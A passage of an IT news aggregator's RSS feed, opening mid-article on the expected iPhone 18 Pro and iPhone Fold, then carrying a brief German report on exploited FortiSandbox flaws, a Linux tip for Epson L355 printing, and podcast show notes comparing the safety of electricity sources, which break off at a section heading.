iOS 27 is expected to play a major role here. Recent software changes and developer guidance suggest Apple wants apps to handle different screen sizes, wider layouts, sidebars, and more flexible views. That matters because a foldable iPhone needs apps to change smoothly when the device opens or closes.



Expected software features include:




Adaptive app layouts that resize between outer and inner displays.



Sidebar navigation for apps on the larger screen.



Split-screen multitasking for productivity.



Better landscape support in Apple apps.



Continuity between screens, so users can start something outside and continue inside.




If Apple gets the software right, the iPhone Fold can feel more useful than a larger iPhone. Apps such as Mail, Safari, Notes, Photos, Files, Calendar, and Messages should benefit most from the bigger inner screen.



Expected Pricing



The iPhone Fold is expected to be Apple’s most expensive iPhone ever. Several reports place the starting price around $2,000, with some estimates going higher depending on storage.



ModelExpected price rangeiPhone 18 ProLikely premium Pro pricingiPhone 18 Pro MaxHigher than ProiPhone FoldAround $2,000 or more



The iPhone Fold will likely target early adopters, professionals, and users who want an iPhone and small tablet in one device. The iPhone 18 Pro will remain the safer choice for users who want the best camera, battery, performance, and reliability in a traditional form factor.



iPhone 18 Pro vs iPhone Fold: Which One Makes More Sense?



The iPhone 18 Pro is the better choice for users who want a proven design, stronger camera system, Face ID, better pocket comfort, and fewer durability concerns. It should also cost much less than the foldable model.



The iPhone Fold makes more sense for users who read a lot, multitask often, edit documents, watch videos, travel frequently, or want the largest iPhone screen possible. It will also appeal to users who already like the idea of an iPad mini but want cellular features and pocketability in one device.



Buy the iPhone 18 Pro if you wantBuy the iPhone Fold if you wantBest traditional iPhoneFirst foldable iPhoneBetter camera focusBigger inner displayFace IDTouch ID side buttonLower price than FoldTablet-like experienceLighter, simpler designBetter multitasking spaceSafer first-year purchaseNew form factor



Final Thoughts



The iPhone 18 Pro and iPhone Fold are expected to define Apple’s September 2026 event. The iPhone 18 Pro should bring the usual Pro upgrades, including the A20 Pro chip, camera improvements, a smaller Dynamic Island, and better efficiency. iPhone Fold should be the headline product because it introduces a new iPhone category for the first time in years.



Apple has not confirmed any of these details, so buyers should treat the current information as early guidance rather than final specifications. Still, the direction is clear: September is expected to focus on Apple’s most premium iPhones, with the iPhone Fold bringing the biggest design shift and the iPhone 18 Pro offering the most polished traditional iPhone experience.]]></content:encoded>
</item>
<item>
<title><![CDATA[Drei FortiSandbox-Schwachstellen werden aktiv ausgenutzt]]></title>
<description><![CDATA[Angreifer nehmen drei kritische Schwachstellen in Fortinets Analyse-Appliance FortiSandbox ins Visier, zwei davon werden aktiv ausgenutzt. Glücklicherweise ist der Exploit für die dritte Lücke fehlerhaft, trotzdem besteht Gefahr. Die Sicherheitslücken erlauben unauthentifizierten Zugriff über man...]]></description>
<link>https://tsecurity.de/de/3620299/it-security-nachrichten/drei-fortisandbox-schwachstellen-werden-aktiv-ausgenutzt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620299/it-security-nachrichten/drei-fortisandbox-schwachstellen-werden-aktiv-ausgenutzt/</guid>
<pubDate>Wed, 24 Jun 2026 07:38:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Angreifer nehmen drei kritische Schwachstellen in Fortinets Analyse-Appliance FortiSandbox ins Visier, zwei davon werden aktiv ausgenutzt. Glücklicherweise ist der Exploit für die dritte Lücke fehlerhaft, trotzdem besteht Gefahr. Die Sicherheitslücken erlauben unauthentifizierten Zugriff über manipulierte HTTP-Anfragen und erreichen einen CVSS-Score von 9,1. Korrigierte Firmware steht bereit.]]></content:encoded>
</item>
<item>
<title><![CDATA[If anyone wants to print with the Epson L355 via usb or wifi, configure the printer with the L310 driver]]></title>
<description><![CDATA[On mint you find printers, add printer, select your printer over cable or wifi, let it search the drivers, wait, then select Epson, and L310 driver. On fedora find printers, add printer, select your printer over cable or wifi, three dots, details, select from the database, find Epson, then EPSON ...]]></description>
<link>https://tsecurity.de/de/3620069/linux-tipps/if-anyone-wants-to-print-with-the-epson-l355-via-usb-or-wifi-configure-the-printer-with-the-l310-driver/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620069/linux-tipps/if-anyone-wants-to-print-with-the-epson-l355-via-usb-or-wifi-configure-the-printer-with-the-l310-driver/</guid>
<pubDate>Wed, 24 Jun 2026 04:40:04 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>On mint you find printers, add printer, select your printer over cable or wifi, let it search the drivers, wait, then select Epson, and L310 driver.</p> <p>On fedora find printers, add printer, select your printer over cable or wifi, three dots, details, select from the database, find Epson, then EPSON L310 CUPS + Gutenprint v5.3.5 </p> <p>I've used Linux for a year and always send prints to print from my phone, first time making it work.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Caju_47"> /u/Caju_47 </a> <br> <span><a href="https://i.redd.it/spnx2npc829h1.jpeg">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1udm5zi/if_anyone_wants_to_print_with_the_epson_l355_via/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4668: Nuclear Power Technology Follow Up on Safety]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.


--------------------






01 Introduction






This is the second follow up to my 8 part series on nuclear power. In this episode I will attempt to answer a question posed by brian in ohio in a comment on HPR4583. In that comment he said:...]]></description>
<link>https://tsecurity.de/de/3619898/podcasts/hpr4668-nuclear-power-technology-follow-up-on-safety/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619898/podcasts/hpr4668-nuclear-power-technology-follow-up-on-safety/</guid>
<pubDate>Wed, 24 Jun 2026 02:03:28 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>
--------------------</p>

<p>

</p>

<p>
01 Introduction</p>

<p>

</p>

<p>
This is the second follow up to my 8 part series on nuclear power. In this episode I will attempt to answer a question posed by brian in ohio in a comment on HPR4583. In that comment he said:</p>

<p>

</p>

<p>
02</p>

<p>
--------------------</p>

<p>

</p>

<p>
Loving this series. Maybe Whiskey Jack could give some cost comparisons between large and small reactors. He could also give us a realistic look at nuclear plant safety/accidents compared to conventional power production. Looking forward to the episode on FORTH generation reactors ;-)</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
03</p>

<p>
End of quote.</p>

<p>

</p>

<p>
The first question I answered in my previous follow up, which was HPR4628. In this episode I will attempt to answer the second question, which was about the safety of nuclear power compared to other sources of electrical power generation.</p>

<p>

</p>

<p>
One of the HPR janitors encouraged me to make this episode, so I think we can thank him for getting another HPR episode made.</p>

<p>

</p>

<p>
04 Defining the Scope</p>

<p>
First, let's define the scope of the question. </p>

<p>

</p>

<p>
This will cover electrical power generation only.</p>

<p>
Within that scope I will consider only the following sources of energy.</p>

<p>

</p>

<p>
05</p>

<p>
Coal</p>

<p>
Oil</p>

<p>
Natural Gas</p>

<p>
Hydroelectric</p>

<p>
Nuclear</p>

<p>
Wind</p>

<p>
Solar</p>

<p>

</p>

<p>
I won't cover geothermal, wave, or tidal power as these are only used in very small amounts and so there simply isn't enough literature on them to base a discussion on . </p>

<p>

</p>

<p>
06 Foreshadow Conclusion</p>

<p>
I should mention right away that I cannot provide absolute answers to this question in the form of a nice, neat ranking table based on numbers from peer reviewed scientific sources. </p>

<p>
The reasons for this will become apparent, but to put it briefly, the data on which to base such a ranking simply doesn't exist. </p>

<p>

</p>

<p>
I will however provide context within which people can think about the issue.</p>

<p>
Wherever possible, I will provide links to the references that I used in the show notes so you can read further on this yourself.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
07 Energy Catastrophism versus Energy Uniformitarianism</p>

<p>

</p>

<p>
First though I need to go off on a slight geological detour in order to explain an important analogy that I will use.</p>

<p>

</p>

<p>
08</p>

<p>
In the 19th century there was a great debate among geologists over what is known as catastrophism versus uniformitarianism.</p>

<p>
In seeking to explain the origins of the earth and of the landscape that we see around us, there were two points of view.</p>

<p>

</p>

<p>
09</p>

<p>
One was "catastrophism". </p>

<p>
This is the belief that the mountains, valleys, and plains that we see around us were formed as a result of great catastrophes which occurred relatively recently in earth's history. </p>

<p>
This explanation was necessary in order to fit geological features into an earth that was believed to be only a few thousands of years old.</p>

<p>
This view was heavily influenced  by religious belief.</p>

<p>
In this view Noah's flood was the great catastrophe and the fossils of dinosaurs were the remains of animals who had not been saved on the ark and so had died in the flood.</p>

<p>

</p>

<p>
10</p>

<p>
The other point of view was uniformitarianism.</p>

<p>
This was the hypothesis that the landscape we see around us can be explained by the very slow accumulation of very small changes over very long periods of time. </p>

<p>
For this to be true however, the earth had to be far older than the few thousand years that a literal reading of the bible would suggest.</p>

<p>
The earth in fact had to be many, many, millions of years old.</p>

<p>

</p>

<p>
11</p>

<p>
Eventually, the uniformitarian view won out and people understood that while some catastrophes can take place, the shape of the landscape is overwhelmingly due to small changes over very long periods of time.</p>

<p>

</p>

<p>

</p>

<p>
12 How is this Relevant to this Episode You Ask?</p>

<p>
How this is relevant is that I will use this analogy to explain how we need to think about energy and safety.</p>

<p>
Very small numbers of deaths and injuries multiplied over many occurrences can add up to big numbers, comparable in scale or possibly even larger than a single catastrophe or even several of them.</p>

<p>

</p>

<p>
13</p>

<p>
I don't know if anyone else has used this analogy before, I have just thought of this when writing the script for this podcast.</p>

<p>
None the less, I think it is a very useful way of helping to understand the issues.</p>

<p>

</p>

<p>
14</p>

<p>
As an example of this, think about the well known case of the safety of flying versus the safety of travelling in your car.</p>

<p>
Air crashes are catastrophes that make the headlines.</p>

<p>
Automobile crashes are seldom more than local news at best.</p>

<p>
You have probably heard many times the claim that if you making a trip somewhere, you are safer to fly than to drive yourself in your car.</p>

<p>

</p>

<p>

</p>

<p>
15 Example - Hydro versus Solar</p>

<p>
I will now present an example of this.</p>

<p>
Hydro electric power has some notable large scale catastrophes associated with it.</p>

<p>
Roof top solar power does not have any notable catastrophes that I am aware of.</p>

<p>
However, which is safer?</p>

<p>

</p>

<p>
16 Hydro Catastrophes</p>

<p>
Here are three examples of hydro electric catastrophes in just one country, Italy.</p>

<p>

</p>

<p>
The Vajont Dam which collapsed in1963</p>

<p>
An estimated 1,917 to 2,500 people died.</p>

<p>

</p>

<p>
The Sella Zerbino dam which collapsed in 1935.</p>

<p>
More than 100 people died.</p>

<p>

</p>

<p>
The Gleno Dam which collapsed in 1923.</p>

<p>
An estimated 350 people died.</p>

<p>

</p>

<p>
https://damfailures.org/</p>

<p>
https://pmc.ncbi.nlm.nih.gov/articles/PMC4997708/</p>

<p>

</p>

<p>
17</p>

<p>
I haven't tried to compile a global list of the worst hydro electric dam collapses, as this sort of information is actually very difficult to find, even on web sites dedicated to dam failures.</p>

<p>
An additional problem is that information on whether a dam was used for electric power generation or not is often not available.</p>

<p>

</p>

<p>
18</p>

<p>
Dam failures where contradictory or insufficient information is available on whether there was an associated hydro power plant include the 1975 Banqian Dam failure, where death estimates range up to a quarter of a million.</p>

<p>

</p>

<p>
19 Solar Panel Slow Accumulation</p>

<p>
Contrast this with roof top solar panels.</p>

<p>
Many small accidents can add up to big numbers as well.</p>

<p>

</p>

<p>
20</p>

<p>
Health and safety literature discussing solar panel safety mention things such as</p>

<p>
Falls from roofs.</p>

<p>
Electric shock.</p>

<p>
Arc flash (burns from electrical arcing).</p>

<p>
Normal electrical safety procedures which are based around locking out sources of energy do not work with solar panels which makes safety more difficult.</p>

<p>
Heat stress due to working exposed in the hot sun.</p>

<p>

</p>

<p>
Warning from US government on falls by solar panel installers.</p>

<p>
https://stacks.cdc.gov/view/cdc/228946</p>

<p>
https://www.osha.gov/green-jobs/solar</p>

<p>

</p>

<p>

</p>

<p>
21 Why We Cannot Compare the Two</p>

<p>
Hydro catastrophes are not well documented, but we can at least find records of some of the most notable ones.</p>

<p>
However, even those have very large variations in estimates of deaths.</p>

<p>

</p>

<p>
22</p>

<p>
Roof top solar deaths however are largely undocumented.</p>

<p>
The industry is largely unregulated.</p>

<p>
There is no central authority which accumulates many individual deaths or injuries.</p>

<p>
At best there are worker and public safety bodies who simply accumulate those statistics into general construction or household injuries.</p>

<p>

</p>

<p>
23</p>

<p>
Thus we have no reliable means of comparing the two energy sources on a comparable basis.</p>

<p>
We face the same problem with all other major electrical energy sources. </p>

<p>
So far as I am aware, there are no peer reviewed scientific studies which compare the relative safety of all of the major electrical energy sources we are considering here based on actual numbers.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
24 Safety Risks</p>

<p>

</p>

<p>
I will now try to list some the major hazards for each of energy sources we are considering.</p>

<p>
There is however limited data available.</p>

<p>
In many cases we just have reference to worker safety organizations as to what the hazards are.</p>

<p>
I will not attempt here to put numbers to these here. </p>

<p>

</p>

<p>
Categories</p>

<p>

</p>

<p>
25 Coal, Oil, Natural Gas</p>

<p>
The hazards are</p>

<p>
Air pollution</p>

<p>
Mining and oil field accidents</p>

<p>
Pipeline explosions</p>

<p>
Transportation accidents. These- move a lot of material so these are significant.</p>

<p>

</p>

<p>
26 Hydroelectric</p>

<p>
These include</p>

<p>
Dam collapse</p>

<p>
Drowning</p>

<p>

</p>

<p>
27 Nuclear</p>

<p>
These include</p>

<p>
Radiation exposure</p>

<p>

</p>

<p>
28 Wind</p>

<p>
These include</p>

<p>
Falls</p>

<p>
Confined space deaths (there is not much detail on this)</p>

<p>
Electric shock</p>

<p>
Ice throws (that is, throwing pieces of ice off the blades)</p>

<p>
This technology has a significant problem with people working alone which greatly increases risks associated with other dangers.</p>

<p>

</p>

<p>
29 Solar</p>

<p>
These include</p>

<p>
Falls</p>

<p>
Electric shock</p>

<p>
Arc flash</p>

<p>
Heat stress</p>

<p>

</p>

<p>
30</p>

<p>
I have not tried to cover all possible risks associated with each category, just the ones which each industry considers to be the risks they concern themselves with.</p>

<p>
There does not exist any means by which risks of similar types are compared across different industries. </p>

<p>

</p>

<p>
31 Reliability of Supply is Also Safety</p>

<p>
In a completely electrified net zero society, reliability of supply is a safety matter.</p>

<p>
People will die in very large numbers in cold climates if they do not have heat.</p>

<p>
If we have no fossil fuels, we need to also consider how reliably does a grid based on any of the options work.</p>

<p>
I have not seen anyone attempt to address this question and will not attempt to address it here.</p>

<p>
However, it must be addressed in any comprehensive attempt to rank safety. </p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
32 Studies or Articles on Estimates of Relative Safety</p>

<p>

</p>

<p>
Despite the difficulties of comparing the safety of different sources of energy, some people have attempted this anyway.</p>

<p>
Different estimates done at different times had different focuses, so unfortunately we do not have a nice set of studies that we can neatly use to cross check one another.</p>

<p>
I will however list the names and the authors and summarize the results.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
33 The Health Hazards of Not Going Nuclear</p>

<p>
By Dr. Petr Beckman</p>

<p>
Published in 1976</p>

<p>

</p>

<p>
The author of this book tried to address the relative safety of different sources of energy in the mid 1970s.</p>

<p>
However, it is old at this point, so I won't bother digging through its pages to find his figures.</p>

<p>

</p>

<p>
34</p>

<p>
He mainly focused on comparing electric power generated with coal to nuclear. </p>

<p>
His conclusion was that if the goal was to prevent deaths or ill health in the process of generating electricity, then the logical conclusion was to replace coal fired power plants with nuclear.</p>

<p>

</p>

<p>
35</p>

<p>
The book was relatively well known at the time, as least as far as books on energy are concerned, so I thought it was still worth mentioning.</p>

<p>
I happen to have a copy of this book which I bought back in that time period</p>

<p>
It was the 8th printing of the book, so it would appear to have had relatively good sales. </p>

<p>

</p>

<p>
36</p>

<p>
The author did address the issue of what I have termed "catastrophism" in his comparison of different energy sources, although I don't know if he used this phrase.</p>

<p>
I don't know if he was the first to use this sort of analysis, but he certainly was very influential in terms of popularizing it.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
37 Risk of Energy Production</p>

<p>
by Herbert Inhaber</p>

<p>
Publication AECB 1119</p>

<p>
March 1978</p>

<p>

</p>

<p>
This study is a scientific paper from the same time period as the book "The Health Hazards of Not Going Nuclear".</p>

<p>

</p>

<p>
38</p>

<p>
He based his risk estimates largely on estimates of the amount of material which was used in the construction and operation of various power sources.</p>

<p>
While we could argue over whether or not this is a valid methodology, I think any such argument would be pointless as I think the age of the study alone renders it not relevant today anyway.</p>

<p>
Advancements in materials have changed the basis results significantly by now.</p>

<p>
However, as it exists I thought I would mention it to show that the idea of comparing energy sources to each other is not a new one.</p>

<p>
The author compared a wider variety of potential sources than Beckman did. </p>

<p>

</p>

<p>
39</p>

<p>
Here's his conclusions.</p>

<p>
He assumes equal amounts of energy produced by each method.</p>

<p>
The numbers are normalized such that the total sums to 100%.</p>

<p>
You can think of it in terms of what proportion of total deaths or injuries would result from each source if each were equally used. </p>

<p>

</p>

<p>
40</p>

<p>
Coal 27.5%</p>

<p>
Oil 25.6%</p>

<p>
Methanol 16.7%</p>

<p>
Wind 10.8%</p>

<p>
Solar photovoltaic 9.2%</p>

<p>
Thermal 8.1%</p>

<p>
Solar space heating 1.5%</p>

<p>
Ocean thermal 0.4%</p>

<p>
Nuclear 0.13%</p>

<p>
Natural Gas 0.08%</p>

<p>

</p>

<p>
41</p>

<p>
His natural gas estimate is drastically different from that of other authors. </p>

<p>
I am not going to worry about explaining it however, as the study is as I said old enough to be not very relevant anyway.</p>

<p>
I am mainly including this here out of historical interest. </p>

<p>

</p>

<p>
42</p>

<p>
As a footnote, the methanol he refers to would be synthesized from wood. This was a popular idea in that era as a means of providing liquid fuels for transportation. Practical battery electric cars in those days were strictly science fiction.</p>

<p>

</p>

<p>
43</p>

<p>
The ocean thermal category is a real blast from the past and I had forgotten all about that concept.</p>

<p>
It was a very popular idea at that time and was supposed to be *the* big and upcoming thing in renewable energy.</p>

<p>
It involved various means of attempting to extract energy from differences in water temperature at different depths in the ocean. </p>

<p>
It gradually faded away however, as despite great efforts being put into it, designs never proved to be practical.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
44 Electricity generation and health</p>

<p>
Anil Markandya, Paul Wilkinson</p>

<p>
Published in the Lancet, Vol 370, 15 September 2007</p>

<p>

</p>

<p>
45</p>

<p>
This is more recent than the previous one, although it is nearly 20 years old at this point.</p>

<p>
Unfortunately it doesn't cover wind or solar, just fossil fuels and nuclear.</p>

<p>
However it is still useful, and the Lancet is a very reputable peer reviewed journal.</p>

<p>

</p>

<p>
46</p>

<p>
I will present just the results rather than discussing the whole paper. </p>

<p>
The authors  break it down into deaths among the public, occupational deaths, and air pollution related deaths, serious illness, and minor illness.</p>

<p>

</p>

<p>
47</p>

<p>
They  break the energy sources down into lignite, coal, gas, oil, biomass, and nuclear. </p>

<p>
Lignite is a type of very low grade coal used mainly for electric power generation. </p>

<p>
In this paper biomass refers to energy crops and forest residues.</p>

<p>

</p>

<p>
48</p>

<p>
I will summarize the results by category rather than trying to describe a table that has 6 rows and 5 columns.</p>

<p>

</p>

<p>
All numbers are normalized in terms of deaths or cases per TWh.</p>

<p>

</p>

<p>
49</p>

<p>
Occupational deaths from accidents</p>

<p>
lignite 0.1 </p>

<p>
coal 0.1 </p>

<p>
gas 0.001</p>

<p>
 oil no data</p>

<p>
biomass - no data</p>

<p>
Nuclear is 0.019. </p>

<p>

</p>

<p>
50</p>

<p>
Deaths among the public from accidents</p>

<p>
lignite 0.02 </p>

<p>
coal 0.02 </p>

<p>
gas 0.02</p>

<p>
 oil 0.03</p>

<p>
biomass no data</p>

<p>
Nuclear 0.003</p>

<p>

</p>

<p>
51</p>

<p>
Air pollution deaths</p>

<p>
lignite 32.6</p>

<p>
coal 24.5</p>

<p>
gas 2.8</p>

<p>
 oil 18.4</p>

<p>
biomass 4.63</p>

<p>
Nuclear 0.052</p>

<p>

</p>

<p>
52</p>

<p>
Air pollution serious illnesses</p>

<p>
lignite 298</p>

<p>
coal 225</p>

<p>
gas 30</p>

<p>
 oil 161</p>

<p>
biomass 43</p>

<p>
Nuclear 0.22</p>

<p>

</p>

<p>
53</p>

<p>
Air pollution minor illnesses</p>

<p>
lignite 17,676</p>

<p>
coal 13,288</p>

<p>
gas 703</p>

<p>
 oil 9,551</p>

<p>
biomass 2,276</p>

<p>
Nuclear no data</p>

<p>

</p>

<p>
54</p>

<p>
Natural gas edges out nuclear power slightly in terms of occupational safety, but in every other category nuclear is drastically lower in terms of ill effects than any of the alternatives.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>

</p>

<p>
55 2020 Fatalities for US Roofers Increased 15% as Solar Roof Installations Increase</p>

<p>
Published in The Next Big Future</p>

<p>
July 6, 2021 by Brian Wang</p>

<p>

</p>

<p>
56</p>

<p>
This seems to be written by someone who has a popular science blog.</p>

<p>
I'm not familiar with it personally, but he addresses the subject so I'll list it.</p>

<p>

</p>

<p>
The title implies that it's all about rooftop solar, but he provides comparative numbers for the other energy sources of interest, so that is useful for our purposes.</p>

<p>
However, he doesn't describe his methodology, so we need to treat them with some caution.</p>

<p>

</p>

<p>
Here are his results</p>

<p>
These are deaths per thousand terawatt hours.</p>

<p>

</p>

<p>
57</p>

<p>
Coal - 100,000</p>

<p>
Oil - 36,000</p>

<p>
Natural gas - 4,000</p>

<p>
Hydro - 1,400</p>

<p>
Rooftop solar - 440</p>

<p>
Wind - 150</p>

<p>
Nuclear - 90</p>

<p>

</p>

<p>
58</p>

<p>
If we plot these numbers on a bar chart, coal and oil are so large that all of the others are squished to the  bottom of the chart and are difficult to see at all.</p>

<p>

</p>

<p>
Let's therefore look at these in terms of orders of magnitude.</p>

<p>
Keep in mind that this is a logarithmic scale.</p>

<p>
This means that the difference between 4 and 5 is much greater in linear terms than the difference between 1 and 2. </p>

<p>

</p>

<p>
59</p>

<p>
Coal - 5</p>

<p>
Oil - 4</p>

<p>
Natural gas - 3</p>

<p>
Hydro - 3</p>

<p>
Rooftop solar - 2</p>

<p>
Wind - 2</p>

<p>
Nuclear - 1</p>

<p>

</p>

<p>
60</p>

<p>
Each of these numbers represents an order of magnitude, that is a power of ten. </p>

<p>
We can see that with rooftop solar, wind, and nuclear, the numbers are so close and the uncertainties are so great and their relative values so small compared to say coal that they can be seen as equivalent so far as safety is concerned.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
61 What are the safest and cleanest sources of energy?</p>

<p>
by Hannah Ritchie</p>

<p>
Published in Our World in Data</p>

<p>
First published in 2017, updated in 2022 and 2024</p>

<p>

</p>

<p>
62</p>

<p>
The author of this study addressed both deaths and greenhouse gas emissions.</p>

<p>
Deaths from accidents and air pollution are normalized to per TWh of electricity, while greenhouse gas emissions are normalized to GWh of electricity over the life cycle of the plant.</p>

<p>

</p>

<p>
63</p>

<p>
Here are the death figures.</p>

<p>
Coal 24.6</p>

<p>
Oil 18.4</p>

<p>
Biomass 4.6</p>

<p>
Natural Gas 2.8</p>

<p>
Hydro power 1.3</p>

<p>
Wind 0.04</p>

<p>
Nuclear 0.03</p>

<p>
Solar 0.02</p>

<p>

</p>

<p>
64</p>

<p>
For greenhouse gas emissions the figures are</p>

<p>
Coal 970 tons</p>

<p>
Oil 720 tons</p>

<p>
Natural gas 440 tons</p>

<p>
Biomass 78 to 230 tons</p>

<p>
Solar 53 tons</p>

<p>
Hydro power 24 tons</p>

<p>
Wind 11 tons</p>

<p>
Nuclear 6 tons</p>

<p>

</p>

<p>
65</p>

<p>
If we take the death figures and rank them by order of magnitude as we did with the previous article, we get the following.</p>

<p>

</p>

<p>
66</p>

<p>
Coal - 4</p>

<p>
Oil - 4</p>

<p>
Biomass - 3</p>

<p>
Natural Gas - 3</p>

<p>
Hydro power - 3</p>

<p>
Wind - 1</p>

<p>
Nuclear - 1</p>

<p>
Solar - 1</p>

<p>

</p>

<p>
67</p>

<p>
Keep in mind that the previous article covered only rooftop solar and not large industrial installations, and so is not directly comparable. </p>

<p>
Also the units are different, with the previous article being in terms of thousand TWh, and this one being in TWh. </p>

<p>
If we exclude solar (as the numbers are not comparable), Brian Wang's numbers are between 1.5 to 4 times higher than Ritchie's, except for hydro which are almost identical. I think this latter is due to both sets of numbers are dominated by one exceptionally big hydro accident. </p>

<p>

</p>

<p>
68</p>

<p>
Overall however, the relative rankings are quite comparable. </p>

<p>

</p>

<p>
Ritchie's numbers for deaths from coal, oil, and natural gas appear to be directly from the study by  Markandya and Wilkinson mentioned above.</p>

<p>

</p>

<p>
For the benefit of those who are wondering, Ritchie specifically states that her numbers for nuclear include the Chernobyl and Fukushima accidents. </p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>

</p>

<p>
https://www.iaea.org/publications/magazines/bulletin/21-1/solar-power-more-dangerous-nuclear</p>

<p>
Direct link to file</p>

<p>
https://www.iaea.org/sites/default/files/publications/magazines/bulletin/bull21-1/21104091117.pdf</p>

<p>

</p>

<p>
https://ourworldindata.org/safest-sources-of-energy</p>

<p>

</p>

<p>
https://www.thelancet.com/journals/lancet/article/PIIS0140-6736(07)61253-7/abstract</p>

<p>

</p>

<p>
https://www.nextbigfuture.com/2021/07/2020-fatalities-for-us-roofers-increased-15-as-solar-roof-installations-increase.html</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
69 Conclusion from Studies</p>

<p>

</p>

<p>
Remember that in engineering terms, when comparing groups of numbers which contain both both very small numbers and one or more very large numbers, the differences between the small numbers are often not significant. </p>

<p>
The differences between the small numbers may be the product of our ability to measure these things rather than any real differences. </p>

<p>

</p>

<p>
70</p>

<p>
For example, in the article by Ritchie wind power would appear to be twice as dangerous as nuclear.</p>

<p>
However, the difference between them is 0.02 compared to 24.6 for coal. </p>

<p>
In other words, the difference between apparently "dangerous" wind and apparently "safe" nuclear is equivalent to 0.08% of the total for coal. </p>

<p>
It's therefore meaningless and a red herring to even worry about.</p>

<p>

</p>

<p>
71</p>

<p>
With the above taken into consideration, generally the different sources of energy fall into two broad categories in terms of number of deaths, injuries, and illnesses.</p>

<p>
The fossil fuels and biomass fall into one group and wind, solar, and nuclear into another group.</p>

<p>

</p>

<p>
72</p>

<p>
Hydro power would seem to fall into the higher risk category or at least somewhere between the two,  but this I suspect is mainly due to one exceptionally large dam collapse in China, the Banqian Dam failure in 1975.</p>

<p>
This is mentioned as being specifically included in the article written by Ritchie.</p>

<p>
This was a multi-purpose dam, and information on this dam is difficult to find.</p>

<p>
It is not clear to me whether it had a hydro electric generator associated with either it or another dam that was part of the same system.</p>

<p>

</p>

<p>
73</p>

<p>
Some people therefor may argue for its exclusion from the numbers.</p>

<p>
Of course some people may argue for its inclusion anyway, as it was a dam regardless of whether it actually had an electric generator attached.</p>

<p>
If we exclude it, then I think the numbers for hydro power would fall into the same range as for nuclear, wind, and solar.</p>

<p>

</p>

<p>
74</p>

<p>
Most people would consider hydro power to be safe and clean enough regardless of this and I will rank it as such in any conclusions that I come to. </p>

<p>
As you can see, even if we have numbers, it can be a matter of opinion as to how to interpret them.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
75 Taking a Systems Approach</p>

<p>

</p>

<p>
Now let's take a look at the broader energy picture today and into the future.</p>

<p>
Many countries in many parts of the world have committed to the concept of "Net Zero", which means eliminating carbon emissions on a net basis.</p>

<p>
Net zero essentially means the complete electrification of society.</p>

<p>
We must therefore have electrical energy on demand and at low cost.</p>

<p>
We must as a result of this look at complete electrical systems rather than individual sources in isolation.</p>

<p>

</p>

<p>
76</p>

<p>
At one time many electrical systems were entirely coal or entirely hydroelectric.</p>

<p>
This is no longer the case.</p>

<p>
There are now major amounts of wind and solar involved in many countries.</p>

<p>
However these are inherently intermittent.</p>

<p>
This means that other sources of energy are inherently also required to have a functional system.</p>

<p>

</p>

<p>
77</p>

<p>
If any particular solution inherently requires fossil fuels to meet part of the demand, then the safety, pollution, and climate issues relating to those fossil fuels have to be factored in to that complete system when trying to come up with a relative ranking.</p>

<p>

</p>

<p>
Talking about Individual sources in isolation are therefore meaningless in these countries.</p>

<p>

</p>

<p>
78</p>

<p>
There are battery systems,  but these are mainly used to stabilize and regulate the grid plus to a lesser degree to smooth out short term daily peaks in demand. </p>

<p>
They do not have the ability to store large amounts of electricity on a large scale for an entire grid for days, weeks, and months to make up for intermittency. </p>

<p>

</p>

<p>
79</p>

<p>
So a serious attempt to rank sources of energy would need to look at a variety of representative countries and for each one come up with a plan that involves 'x' megawatts from source 'a', 'y' megawatts from source 'b', etc., and total up the values for each. </p>

<p>

</p>

<p>
80</p>

<p>
I am not aware of anyone who has studied this larger issue.</p>

<p>
However, the problem has to be addressed from this perspective in order for any answer to be useful.</p>

<p>
Not taking this into account is like ordering a diet soft drink to go with with a high calorie meal and assuring yourself that your plans to diet are fine. </p>

<p>

</p>

<p>
81</p>

<p>
This is not to imply there is anything inherently wrong with wind or solar.</p>

<p>
It does mean that if your goal is to achieve both net zero and a clean environment, you have to look at your entire energy system as a complete system rather than focusing on what you feel are the most reassuring parts of it while ignoring the rest.</p>

<p>

</p>

<p>
This does however add to the argument that it is in fact inherently very difficult to come up with a system of ranking energy sources for safety.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
82 Nuclear, Climate, and Clean Air - Contrasting Examples</p>

<p>

</p>

<p>
To give a tangible example we will now look at two different places that followed two divergent paths at roughly around the same time frame.</p>

<p>

</p>

<p>
These are the province of Ontario in Canada, and Germany. </p>

<p>

</p>

<p>
83</p>

<p>
Ontario had a mix of coal, hydro electric, and nuclear generating plants.</p>

<p>
Germany had a mix of coal, nuclear and natural gas plants.</p>

<p>

</p>

<p>
Ontario shut down their coal fired plants and kept their nuclear plants.</p>

<p>
Germany however shut down their nuclear plants and kept their coal fired plants.</p>

<p>

</p>

<p>

</p>

<p>
84 The Phase Out of Coal in Ontario</p>

<p>

</p>

<p>
